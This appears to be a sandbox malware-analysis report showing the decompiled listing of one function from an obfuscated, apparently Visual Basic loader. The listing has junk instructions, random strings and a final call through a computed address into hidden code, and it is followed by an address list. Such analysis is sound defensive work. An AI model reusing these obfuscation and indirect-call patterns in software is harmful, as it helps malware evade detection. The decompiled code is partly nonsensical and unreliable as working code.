Function 0040D2A4, Relevance: 241.3, APIs: 126, Strings: 11, Instructions: 1553
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0040D2A4(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int _a4) {
				void* _v3;
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v22;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v44;
				short _v48;
				long long _v56;
				short _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				char _v76;
				char _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				signed int _v100;
				char _v104;
				char _v108;
				intOrPtr _v116;
				char _v124;
				intOrPtr _v132;
				char _v140;
				char _v156;
				char _v172;
				char _v188;
				char* _v196;
				char _v204;
				char* _v212;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				signed int _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v268;
				long long _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				intOrPtr* _v320;
				signed int _v324;
				intOrPtr* _v328;
				signed int _v332;
				signed int _v336;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				intOrPtr* _v380;
				signed int _v384;
				signed int _v388;
				intOrPtr* _v392;
				signed int _v396;
				intOrPtr* _v400;
				signed int _v404;
				intOrPtr* _v408;
				signed int _v412;
				intOrPtr* _v416;
				signed int _v420;
				intOrPtr* _v424;
				signed int _v428;
				intOrPtr* _v432;
				signed int _v436;
				intOrPtr* _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				intOrPtr* _v456;
				signed int _v460;
				char _v464;
				signed int _v468;
				signed int _v472;
				char _v476;
				signed int _v480;
				intOrPtr* _v484;
				signed int _v488;
				intOrPtr* _v492;
				signed int _v496;
				intOrPtr* _v500;
				signed int _v504;
				intOrPtr* _v508;
				signed int _v512;
				intOrPtr* _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				intOrPtr* _v532;
				signed int _v536;
				signed int _v540;
				intOrPtr* _v544;
				signed int _v548;
				intOrPtr* _v552;
				signed int _v556;
				intOrPtr* _v560;
				signed int _v564;
				signed int _v568;
				intOrPtr* _v572;
				signed int _v576;
				intOrPtr* _v580;
				signed int _v584;
				intOrPtr* _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				void* _v1924089791;
				intOrPtr* _t778;
				void* _t781;
				intOrPtr _t782;
				signed int _t783;
				char* _t792;
				signed int _t796;
				signed int _t807;
				signed int _t812;
				signed int _t817;
				signed int _t821;
				signed int _t825;
				signed int _t829;
				signed int _t833;
				signed int _t837;
				signed int _t841;
				signed int _t845;
				signed int _t849;
				signed int _t853;
				char* _t857;
				signed int _t861;
				char* _t865;
				signed int _t869;
				signed int _t883;
				signed int _t902;
				signed int _t908;
				signed int _t912;
				signed int _t916;
				signed int _t920;
				signed int _t932;
				signed int _t941;
				signed int _t945;
				signed int _t949;
				signed int _t953;
				signed int _t968;
				signed int _t972;
				signed int _t976;
				signed int _t980;
				signed int _t984;
				signed int _t988;
				signed int _t992;
				signed int _t996;
				signed int _t1005;
				signed int _t1012;
				signed int _t1016;
				signed int _t1020;
				signed int _t1030;
				signed int _t1037;
				signed int _t1041;
				signed int _t1051;
				signed int _t1055;
				signed int _t1060;
				signed int _t1064;
				signed int _t1065;
				signed int _t1069;
				signed int _t1076;
				signed int _t1080;
				signed int _t1085;
				signed int _t1089;
				signed int _t1093;
				signed int _t1097;
				char* _t1100;
				signed int _t1104;
				signed int _t1112;
				signed int _t1118;
				void* _t1119;
				char* _t1133;
				signed int* _t1165;
				signed int* _t1179;
				intOrPtr _t1218;
				void* _t1239;
				void* _t1242;
				intOrPtr _t1243;
				void* _t1244;
				void* _t1246;
				void* _t1247;
				void* _t1249;
				void* _t1250;
				void* _t1251;
				void* _t1252;
				void* _t1253;
				void* _t1254;
				signed int* _t1255;

				asm("in al, dx");
				_t1243 = _t1242 - 0x18;
				_t778 =  *[fs:0x0];
				 *[fs:0x0] = _t1243;
				 *_t778 =  *_t778 + _t778;
				 *_t778 =  *_t778 + _t778;
				_t781 = 0x238 +  *0x238 + __ecx;
				goto 0x5440d207;
				_v28 = _t1243;
				_v24 = 0x401120;
				_t782 = _t781 + 1;
				 *((intOrPtr*)(__ebx - 0x1f7cf7bb)) =  *((intOrPtr*)(__ebx - 0x1f7cf7bb)) + __ecx;
				asm("loopne 0x3");
				_v20 = _t782;
				_t783 = _a4;
				 *(__ebx + 0x4589fee0) =  *(__ebx + 0x4589fee0) | _t783;
				_a4 = _t783 & 0xfffffffe;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, _t778, 0x4012b6, _t1239);
				_v8 = 1;
				_v8 = 2;
				_push( &_v124);
				L0040143C();
				_push( &_v140);
				L0040143C();
				_v196 = 1;
				_v204 = 2;
				_push(1);
				_push(1);
				_push( &_v140);
				_push( &_v204);
				_t792 =  &_v156;
				_push(_t792);
				L0040142A();
				_push(_t792);
				_push( &_v124);
				_push(0x40b1cc);
				_push( &_v172);
				L00401430();
				_v212 = 1;
				_v220 = 0x8002;
				_push( &_v172);
				_t796 =  &_v220;
				_push(_t796);
				L00401436();
				_v280 = _t796;
				_push( &_v172);
				_push( &_v156);
				_push( &_v124);
				_push( &_v140);
				_push(4);
				L00401424();
				_t1244 = _t1243 + 0x14;
				if(_v280 != 0) {
					_v8 = 3;
					_push(0);
					_push(L"ufTzjJIsQNKXRsYTsDH8CMFnOLh801g4OZsr97");
					_push( &_v124);
					L0040141E();
					L00401418();
				}
				_v8 = 5;
				if( *0x4112d4 != 0) {
					_v380 = 0x4112d4;
				} else {
					_push(0x4112d4);
					_push(0x40b244);
					L00401412();
					_v380 = 0x4112d4;
				}
				_v280 =  *_v380;
				_t807 =  *((intOrPtr*)( *_v280 + 0x14))(_v280,  &_v80);
				asm("fclex");
				_v284 = _t807;
				if(_v284 >= 0) {
					_v384 = _v384 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40b234);
					_push(_v280);
					_push(_v284);
					L0040140C();
					_v384 = _t807;
				}
				_v288 = _v80;
				_t812 =  *((intOrPtr*)( *_v288 + 0xc0))(_v288,  &_v224);
				asm("fclex");
				_v292 = _t812;
				if(_v292 >= 0) {
					_v388 = _v388 & 0x00000000;
				} else {
					_push(0xc0);
					_push(0x40b254);
					_push(_v288);
					_push(_v292);
					L0040140C();
					_v388 = _t812;
				}
				_v60 = _v224;
				L00401406();
				_v8 = 6;
				if( *0x411010 != 0) {
					_v392 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v392 = 0x411010;
				}
				_t817 =  &_v80;
				L00401400();
				_v280 = _t817;
				_t821 =  *((intOrPtr*)( *_v280 + 0x190))(_v280,  &_v224, _t817,  *((intOrPtr*)( *((intOrPtr*)( *_v392)) + 0x2fc))( *_v392));
				asm("fclex");
				_v284 = _t821;
				if(_v284 >= 0) {
					_v396 = _v396 & 0x00000000;
				} else {
					_push(0x190);
					_push(0x40b290);
					_push(_v280);
					_push(_v284);
					L0040140C();
					_v396 = _t821;
				}
				if( *0x411010 != 0) {
					_v400 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v400 = 0x411010;
				}
				_t825 =  &_v84;
				L00401400();
				_v288 = _t825;
				_t829 =  *((intOrPtr*)( *_v288 + 0xf0))(_v288,  &_v228, _t825,  *((intOrPtr*)( *((intOrPtr*)( *_v400)) + 0x2fc))( *_v400));
				asm("fclex");
				_v292 = _t829;
				if(_v292 >= 0) {
					_v404 = _v404 & 0x00000000;
				} else {
					_push(0xf0);
					_push(0x40b290);
					_push(_v288);
					_push(_v292);
					L0040140C();
					_v404 = _t829;
				}
				if( *0x411010 != 0) {
					_v408 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v408 = 0x411010;
				}
				_t833 =  &_v88;
				L00401400();
				_v296 = _t833;
				_t837 =  *((intOrPtr*)( *_v296 + 0x60))(_v296,  &_v244, _t833,  *((intOrPtr*)( *((intOrPtr*)( *_v408)) + 0x2fc))( *_v408));
				asm("fclex");
				_v300 = _t837;
				if(_v300 >= 0) {
					_v412 = _v412 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40b290);
					_push(_v296);
					_push(_v300);
					L0040140C();
					_v412 = _t837;
				}
				if( *0x411010 != 0) {
					_v416 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v416 = 0x411010;
				}
				_t841 =  &_v92;
				L00401400();
				_v304 = _t841;
				_t845 =  *((intOrPtr*)( *_v304 + 0x68))(_v304,  &_v248, _t841,  *((intOrPtr*)( *((intOrPtr*)( *_v416)) + 0x2fc))( *_v416));
				asm("fclex");
				_v308 = _t845;
				if(_v308 >= 0) {
					_v420 = _v420 & 0x00000000;
				} else {
					_push(0x68);
					_push(0x40b290);
					_push(_v304);
					_push(_v308);
					L0040140C();
					_v420 = _t845;
				}
				if( *0x411010 != 0) {
					_v424 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v424 = 0x411010;
				}
				_t849 =  &_v96;
				L00401400();
				_v312 = _t849;
				_t853 =  *((intOrPtr*)( *_v312 + 0xf8))(_v312,  &_v100, _t849,  *((intOrPtr*)( *((intOrPtr*)( *_v424)) + 0x308))( *_v424));
				asm("fclex");
				_v316 = _t853;
				if(_v316 >= 0) {
					_v428 = _v428 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x40b290);
					_push(_v312);
					_push(_v316);
					L0040140C();
					_v428 = _t853;
				}
				if( *0x411010 != 0) {
					_v432 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v432 = 0x411010;
				}
				_t857 =  &_v104;
				L00401400();
				_v320 = _t857;
				_t861 =  *((intOrPtr*)( *_v320 + 0x150))(_v320,  &_v252, _t857,  *((intOrPtr*)( *((intOrPtr*)( *_v432)) + 0x2fc))( *_v432));
				asm("fclex");
				_v324 = _t861;
				if(_v324 >= 0) {
					_v436 = _v436 & 0x00000000;
				} else {
					_push(0x150);
					_push(0x40b290);
					_push(_v320);
					_push(_v324);
					L0040140C();
					_v436 = _t861;
				}
				if( *0x411010 != 0) {
					_v440 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v440 = 0x411010;
				}
				_t865 =  &_v108;
				L00401400();
				_v328 = _t865;
				_t869 =  *((intOrPtr*)( *_v328 + 0x1e0))(_v328,  &_v68, _t865,  *((intOrPtr*)( *((intOrPtr*)( *_v440)) + 0x2fc))( *_v440));
				asm("fclex");
				_v332 = _t869;
				if(_v332 >= 0) {
					_v444 = _v444 & 0x00000000;
				} else {
					_push(0x1e0);
					_push(0x40b290);
					_push(_v328);
					_push(_v332);
					L0040140C();
					_v444 = _t869;
				}
				_v360 = _v68;
				_v68 = _v68 & 0x00000000;
				L004013FA();
				_v364 = _v100;
				_v100 = _v100 & 0x00000000;
				_v116 = _v364;
				_v124 = 9;
				_v260 =  *0x4011c0;
				_v256 = _v244;
				_v232 = _v228;
				L004013F4();
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t883 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v72, _v224,  &_v232, 0x4b62b0,  &_v256, _v248,  &_v260, 0x10, _v252,  &_v76);
				_v336 = _t883;
				if(_v336 >= 0) {
					_v448 = _v448 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x40af08);
					_push(_a4);
					_push(_v336);
					L0040140C();
					_v448 = _t883;
				}
				L004013EE();
				L004013E8();
				_t1246 = _t1244 + 0x2c;
				L00401418();
				_v8 = 7;
				_v212 = L"fUPuI258LdPeF8nWNkpe0FFXz0Od1fzRyo7rs9K86";
				_v220 = 8;
				L004013E2();
				_v196 = L"fT186";
				_v204 = 8;
				_v244 = 0x7d4237;
				L004013F4();
				_t1165 =  &_v68;
				L004013F4();
				_v268 =  *0x4011b8;
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t259 =  &_v244; // 0x7d4237
				_v324 =  *0x4011b0;
				_t902 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v268, _t1165, _t1165,  &_v68,  &_v72, _t259, 0x10,  &_v124,  &_v276, 7,  &_v80,  &_v84,  &_v88,  &_v92,  &_v96,  &_v104,  &_v108, 2,  &_v72,  &_v76);
				_v280 = _t902;
				if(_v280 >= 0) {
					_v452 = _v452 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x40af08);
					_push(_a4);
					_push(_v280);
					L0040140C();
					_v452 = _t902;
				}
				_v56 = _v276;
				_push( &_v72);
				_push( &_v68);
				_push(2);
				L004013EE();
				_t1247 = _t1246 + 0xc;
				L00401418();
				_v8 = 8;
				if( *0x411010 != 0) {
					_v456 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v456 = 0x411010;
				}
				_t908 =  &_v80;
				L00401400();
				_v280 = _t908;
				_t912 =  *((intOrPtr*)( *_v280 + 0x130))(_v280,  &_v68, _t908,  *((intOrPtr*)( *((intOrPtr*)( *_v456)) + 0x2fc))( *_v456));
				asm("fclex");
				_v284 = _t912;
				if(_v284 >= 0) {
					_v460 = _v460 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x40b290);
					_push(_v280);
					_push(_v284);
					L0040140C();
					_v460 = _t912;
				}
				if( *0x411010 != 0) {
					_v464 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v464 = 0x411010;
				}
				_t916 =  &_v84;
				L00401400();
				_v288 = _t916;
				_t920 =  *((intOrPtr*)( *_v288 + 0x108))(_v288,  &_v72, _t916,  *((intOrPtr*)( *((intOrPtr*)( *_v464)) + 0x2fc))( *_v464));
				asm("fclex");
				_v292 = _t920;
				if(_v292 >= 0) {
					_v468 = _v468 & 0x00000000;
				} else {
					_push(0x108);
					_push(0x40b290);
					_push(_v288);
					_push(_v292);
					L0040140C();
					_v468 = _t920;
				}
				_v368 = _v72;
				_v72 = _v72 & 0x00000000;
				_v132 = _v368;
				_v140 = 8;
				_v268 =  *0x4011a8;
				_v244 = 0x59248a;
				_v372 = _v68;
				_v68 = _v68 & 0x00000000;
				_v116 = _v372;
				_v124 = 8;
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t932 =  *((intOrPtr*)( *_a4 + 0x700))(_a4, 0x18749800, 0x5afd,  &_v124,  &_v244, 0x3c61,  &_v268, 0x10,  &_v248);
				_v296 = _t932;
				if(_v296 >= 0) {
					_v472 = _v472 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x40af08);
					_push(_a4);
					_push(_v296);
					L0040140C();
					_v472 = _t932;
				}
				_v64 = _v248;
				_push( &_v84);
				_push( &_v80);
				_push(2);
				L004013E8();
				_push( &_v140);
				_push( &_v124);
				_push(2);
				L00401424();
				_t1249 = _t1247 + 0x18;
				_v8 = 9;
				if( *0x411010 != 0) {
					_v476 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v476 = 0x411010;
				}
				_t941 =  &_v80;
				L00401400();
				_v280 = _t941;
				_t945 =  *((intOrPtr*)( *_v280 + 0x68))(_v280,  &_v244, _t941,  *((intOrPtr*)( *((intOrPtr*)( *_v476)) + 0x2fc))( *_v476));
				asm("fclex");
				_v284 = _t945;
				if(_v284 >= 0) {
					_v480 = _v480 & 0x00000000;
				} else {
					_push(0x68);
					_push(0x40b290);
					_push(_v280);
					_push(_v284);
					L0040140C();
					_v480 = _t945;
				}
				if( *0x411010 != 0) {
					_v484 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v484 = 0x411010;
				}
				_t949 =  &_v84;
				L00401400();
				_v288 = _t949;
				_t953 =  *((intOrPtr*)( *_v288 + 0x70))(_v288,  &_v248, _t949,  *((intOrPtr*)( *((intOrPtr*)( *_v484)) + 0x2fc))( *_v484));
				asm("fclex");
				_v292 = _t953;
				if(_v292 >= 0) {
					_v488 = _v488 & 0x00000000;
				} else {
					_push(0x70);
					_push(0x40b290);
					_push(_v288);
					_push(_v292);
					L0040140C();
					_v488 = _t953;
				}
				_t1179 =  &_v68;
				L004013F4();
				_v116 = 0x7e9a53;
				_v124 = 3;
				_v252 = _v244;
				_v452 = _v248;
				_v464 =  *0x4011a0;
				_v476 =  *0x401198;
				_v488 =  *0x401190;
				 *((intOrPtr*)( *_a4 + 0x71c))(_a4, _t1179, _t1179,  &_v252, _t1179, _t1179,  &_v124, _t1179, _t1179,  &_v68, _t1179,  &_v224);
				_v48 = _v224;
				L004013DC();
				_push( &_v84);
				_push( &_v80);
				_push(2);
				L004013E8();
				_t1250 = _t1249 + 0xc;
				L00401418();
				_v8 = 0xa;
				if( *0x411010 != 0) {
					_v492 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v492 = 0x411010;
				}
				_t968 =  &_v80;
				L00401400();
				_v280 = _t968;
				_t972 =  *((intOrPtr*)( *_v280 + 0x190))(_v280,  &_v224, _t968,  *((intOrPtr*)( *((intOrPtr*)( *_v492)) + 0x2fc))( *_v492));
				asm("fclex");
				_v284 = _t972;
				if(_v284 >= 0) {
					_v496 = _v496 & 0x00000000;
				} else {
					_push(0x190);
					_push(0x40b290);
					_push(_v280);
					_push(_v284);
					L0040140C();
					_v496 = _t972;
				}
				if( *0x411010 != 0) {
					_v500 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v500 = 0x411010;
				}
				_t976 =  &_v84;
				L00401400();
				_v288 = _t976;
				_t980 =  *((intOrPtr*)( *_v288 + 0xf0))(_v288,  &_v228, _t976,  *((intOrPtr*)( *((intOrPtr*)( *_v500)) + 0x2fc))( *_v500));
				asm("fclex");
				_v292 = _t980;
				if(_v292 >= 0) {
					_v504 = _v504 & 0x00000000;
				} else {
					_push(0xf0);
					_push(0x40b290);
					_push(_v288);
					_push(_v292);
					L0040140C();
					_v504 = _t980;
				}
				if( *0x411010 != 0) {
					_v508 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v508 = 0x411010;
				}
				_t984 =  &_v88;
				L00401400();
				_v296 = _t984;
				_t988 =  *((intOrPtr*)( *_v296 + 0xe0))(_v296,  &_v232, _t984,  *((intOrPtr*)( *((intOrPtr*)( *_v508)) + 0x2fc))( *_v508));
				asm("fclex");
				_v300 = _t988;
				if(_v300 >= 0) {
					_v512 = _v512 & 0x00000000;
				} else {
					_push(0xe0);
					_push(0x40b290);
					_push(_v296);
					_push(_v300);
					L0040140C();
					_v512 = _t988;
				}
				if( *0x411010 != 0) {
					_v516 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v516 = 0x411010;
				}
				_t992 =  &_v92;
				L00401400();
				_v304 = _t992;
				_t996 =  *((intOrPtr*)( *_v304 + 0x60))(_v304,  &_v244, _t992,  *((intOrPtr*)( *((intOrPtr*)( *_v516)) + 0x2fc))( *_v516));
				asm("fclex");
				_v308 = _t996;
				if(_v308 >= 0) {
					_v520 = _v520 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40b290);
					_push(_v304);
					_push(_v308);
					L0040140C();
					_v520 = _t996;
				}
				_v240 = _v232;
				_v248 =  *0x40118c;
				_v236 = _v224;
				_v196 = L"Qh0H173";
				_v204 = 8;
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1005 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, 0x10,  &_v236,  &_v248, _v228,  &_v240, _v244);
				_v312 = _t1005;
				if(_v312 >= 0) {
					_v524 = _v524 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x40af08);
					_push(_a4);
					_push(_v312);
					L0040140C();
					_v524 = _t1005;
				}
				L004013E8();
				_t1251 = _t1250 + 0x14;
				_v8 = 0xb;
				_t1012 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 4,  &_v80,  &_v84,  &_v88,  &_v92);
				_v280 = _t1012;
				if(_v280 >= 0) {
					_v528 = _v528 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x40af08);
					_push(_a4);
					_push(_v280);
					L0040140C();
					_v528 = _t1012;
				}
				_v8 = 0xc;
				if( *0x411010 != 0) {
					_v532 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v532 = 0x411010;
				}
				_t1016 =  &_v80;
				L00401400();
				_v280 = _t1016;
				_t1020 =  *((intOrPtr*)( *_v280 + 0x178))(_v280,  &_v84, _t1016,  *((intOrPtr*)( *((intOrPtr*)( *_v532)) + 0x2fc))( *_v532));
				asm("fclex");
				_v284 = _t1020;
				if(_v284 >= 0) {
					_v536 = _v536 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x40b290);
					_push(_v280);
					_push(_v284);
					L0040140C();
					_v536 = _t1020;
				}
				_v376 = _v84;
				_v84 = _v84 & 0x00000000;
				_v132 = _v376;
				_v140 = 9;
				_v196 = L"lGTv3G208";
				_v204 = 8;
				L004013E2();
				_v244 = 0x449b52;
				_v224 = 0x37d8;
				_t1030 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v224,  &_v244,  &_v124,  &_v140,  &_v248);
				_v288 = _t1030;
				if(_v288 >= 0) {
					_v540 = _v540 & 0x00000000;
				} else {
					_push(0x70c);
					_push(0x40af08);
					_push(_a4);
					_push(_v288);
					L0040140C();
					_v540 = _t1030;
				}
				_v44 = _v248;
				L00401406();
				_push( &_v140);
				_push( &_v124);
				_push(2);
				L00401424();
				_t1252 = _t1251 + 0xc;
				_v8 = 0xd;
				if( *0x411010 != 0) {
					_v544 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v544 = 0x411010;
				}
				_t1037 =  &_v80;
				L00401400();
				_v280 = _t1037;
				_t1041 =  *((intOrPtr*)( *_v280 + 0x60))(_v280,  &_v244, _t1037,  *((intOrPtr*)( *((intOrPtr*)( *_v544)) + 0x2fc))( *_v544));
				asm("fclex");
				_v284 = _t1041;
				if(_v284 >= 0) {
					_v548 = _v548 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40b290);
					_push(_v280);
					_push(_v284);
					L0040140C();
					_v548 = _t1041;
				}
				_v248 = _v244;
				_v268 =  *0x4011b8;
				 *((intOrPtr*)( *_a4 + 0x720))(_a4,  &_v268,  &_v248, L"b9UVneZWLXkDS125");
				L00401406();
				_v8 = 0xe;
				if( *0x411010 != 0) {
					_v552 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v552 = 0x411010;
				}
				_t1051 =  &_v80;
				L00401400();
				_v280 = _t1051;
				_t1055 =  *((intOrPtr*)( *_v280 + 0x178))(_v280,  &_v84, _t1051,  *((intOrPtr*)( *((intOrPtr*)( *_v552)) + 0x308))( *_v552));
				asm("fclex");
				_v284 = _t1055;
				if(_v284 >= 0) {
					_v556 = _v556 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x40b290);
					_push(_v280);
					_push(_v284);
					L0040140C();
					_v556 = _t1055;
				}
				_push(0);
				_push(0);
				_push(_v84);
				_push( &_v124);
				L004013D6();
				_t1253 = _t1252 + 0x10;
				if( *0x411010 != 0) {
					_v560 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v560 = 0x411010;
				}
				_t1060 =  &_v88;
				L00401400();
				_v288 = _t1060;
				_t1064 =  *((intOrPtr*)( *_v288 + 0x68))(_v288,  &_v244, _t1060,  *((intOrPtr*)( *((intOrPtr*)( *_v560)) + 0x2fc))( *_v560));
				asm("fclex");
				_v292 = _t1064;
				if(_v292 >= 0) {
					_v564 = _v564 & 0x00000000;
				} else {
					_push(0x68);
					_push(0x40b290);
					_push(_v288);
					_push(_v292);
					L0040140C();
					_v564 = _t1064;
				}
				_t1065 =  &_v124;
				L004013D0();
				_v248 = _t1065;
				_t1069 =  *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v248, _v244, _t1065);
				_v296 = _t1069;
				if(_v296 >= 0) {
					_v568 = _v568 & 0x00000000;
				} else {
					_push(0x710);
					_push(0x40af08);
					_push(_a4);
					_push(_v296);
					L0040140C();
					_v568 = _t1069;
				}
				_push( &_v84);
				_push( &_v88);
				_push( &_v80);
				_push(3);
				L004013E8();
				_t1254 = _t1253 + 0x10;
				L00401418();
				_v8 = 0xf;
				if( *0x411010 != 0) {
					_v572 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v572 = 0x411010;
				}
				_t1076 =  &_v80;
				L00401400();
				_v280 = _t1076;
				_t1080 =  *((intOrPtr*)( *_v280 + 0x178))(_v280,  &_v84, _t1076,  *((intOrPtr*)( *((intOrPtr*)( *_v572)) + 0x2fc))( *_v572));
				asm("fclex");
				_v284 = _t1080;
				if(_v284 >= 0) {
					_v576 = _v576 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x40b290);
					_push(_v280);
					_push(_v284);
					L0040140C();
					_v576 = _t1080;
				}
				_push(0);
				_push(0);
				_push(_v84);
				_push( &_v124);
				L004013D6();
				_t1255 = _t1254 + 0x10;
				if( *0x411010 != 0) {
					_v580 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v580 = 0x411010;
				}
				_t1085 =  &_v88;
				L00401400();
				_v288 = _t1085;
				_t1089 =  *((intOrPtr*)( *_v288 + 0x68))(_v288,  &_v244, _t1085,  *((intOrPtr*)( *((intOrPtr*)( *_v580)) + 0x2fc))( *_v580));
				asm("fclex");
				_v292 = _t1089;
				if(_v292 >= 0) {
					_v584 = _v584 & 0x00000000;
				} else {
					_push(0x68);
					_push(0x40b290);
					_push(_v288);
					_push(_v292);
					L0040140C();
					_v584 = _t1089;
				}
				if( *0x411010 != 0) {
					_v588 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v588 = 0x411010;
				}
				_t1218 =  *((intOrPtr*)( *_v588));
				_t1093 =  &_v92;
				L00401400();
				_v296 = _t1093;
				_t1097 =  *((intOrPtr*)( *_v296 + 0x88))(_v296,  &_v248, _t1093,  *((intOrPtr*)(_t1218 + 0x2fc))( *_v588));
				asm("fclex");
				_v300 = _t1097;
				if(_v300 >= 0) {
					_v592 = _v592 & 0x00000000;
				} else {
					_push(0x88);
					_push(0x40b290);
					_push(_v296);
					_push(_v300);
					L0040140C();
					_v592 = _t1097;
				}
				_v252 = _v244;
				_v224 = 0x11d2;
				 *_t1255 = _v248;
				_t1100 =  &_v124;
				L004013D0();
				_t1104 =  *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v224, _t1100, _t1100,  &_v252, _t1218);
				_v304 = _t1104;
				if(_v304 >= 0) {
					_v596 = _v596 & 0x00000000;
				} else {
					_push(0x714);
					_push(0x40af08);
					_push(_a4);
					_push(_v304);
					L0040140C();
					_v596 = _t1104;
				}
				L004013E8();
				L00401418();
				_v8 = 0x10;
				_t1112 =  *((intOrPtr*)( *_a4 + 0x1b8))(_a4,  &_v224, 4,  &_v80,  &_v88,  &_v92,  &_v84);
				asm("fclex");
				_v280 = _t1112;
				if(_v280 >= 0) {
					_v600 = _v600 & 0x00000000;
				} else {
					_push(0x1b8);
					_push(0x40aed8);
					_push(_a4);
					_push(_v280);
					L0040140C();
					_v600 = _t1112;
				}
				_t1118 =  *((intOrPtr*)( *_a4 + 0x1bc))(_a4, 0);
				asm("fclex");
				_v284 = _t1118;
				if(_v284 >= 0) {
					_v604 = _v604 & 0x00000000;
				} else {
					_push(0x1bc);
					_push(0x40aed8);
					_push(_a4);
					_push(_v284);
					L0040140C();
					_v604 = _t1118;
				}
				_v8 = 0x11;
				L004013CA();
				_v8 = 0x12;
				_v22 = 0xffd592c7;
				_v22 = _v22 + 0x6a95b0;
				_t1119 = _v22(0xffffffff);
				asm("in al, dx");
				_push(_t1119 + 1);
				_push(3);
				L004013EE();
				_push( &_v108);
				_push( &_v104);
				_push( &_v100);
				_push( &_v96);
				_push( &_v92);
				_push( &_v88);
				_push( &_v84);
				_push( &_v80);
				_push(8);
				L004013E8();
				_push( &_v188);
				_push( &_v172);
				_push( &_v156);
				_push( &_v140);
				_t1133 =  &_v124;
				_push(_t1133);
				_push(5);
				L00401424();
				return _t1133;
			}

0x0040d2a6
0x0040d2a7
0x0040d2af
0x0040d2b6
0x0040d2b9
0x0040d2bb
0x0040d2c1
0x0040d2c3
0x0040d2ca
0x0040d2cd
0x0040d2d2
0x0040d2d3
0x0040d2d8
0x0040d2da
0x0040d2dd
0x0040d2df
0x0040d2e3
0x0040d2e6
0x0040d2f5
0x0040d2f8
0x0040d2ff
0x0040d309
0x0040d30a
0x0040d315
0x0040d316
0x0040d31b
0x0040d325
0x0040d32f
0x0040d331
0x0040d339
0x0040d340
0x0040d341
0x0040d347
0x0040d348
0x0040d34d
0x0040d351
0x0040d352
0x0040d35d
0x0040d35e
0x0040d363
0x0040d36d
0x0040d37d
0x0040d37e
0x0040d384
0x0040d385
0x0040d38a
0x0040d397
0x0040d39e
0x0040d3a2
0x0040d3a9
0x0040d3aa
0x0040d3ac
0x0040d3b1
0x0040d3bd
0x0040d3bf
0x0040d3c6
0x0040d3c8
0x0040d3d0
0x0040d3d1
0x0040d3d9
0x0040d3d9
0x0040d3de
0x0040d3ec
0x0040d409
